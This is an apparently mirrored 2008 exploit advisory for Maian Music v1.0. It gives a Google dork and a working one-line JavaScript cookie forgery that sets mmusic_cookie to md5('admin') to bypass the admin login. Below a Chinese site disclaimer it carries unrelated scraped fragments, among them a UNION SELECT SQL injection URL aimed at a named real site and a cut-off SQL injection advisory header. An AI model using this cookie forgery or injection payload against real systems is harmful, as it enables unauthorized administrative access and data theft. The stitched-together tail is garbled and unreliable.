时间:2021-05-24
Author: Saime
Date: July 12, 2008
Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.
Description:
Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,
equals admin username.(md5)
Exploit:
javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
fromhttp:///c/a/MySQL/Error-Handling-Examples/ErrorHandlerExamplesHerearesomeexa
问题https://docs.python.org/3/tutorial/errors.html#handling-exceptionshttps://docs
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,2,3,4,5--h
本文实例讲述了JS获取并处理php数组的方法。分享给大家供大家参考,具体如下:$music=array();$music['tayler']=array();$
影响版本:AWBS2.9.2 官方网站:http:// 漏洞类型:SQL注入 漏洞描述: ---Vulnerability--- http(s):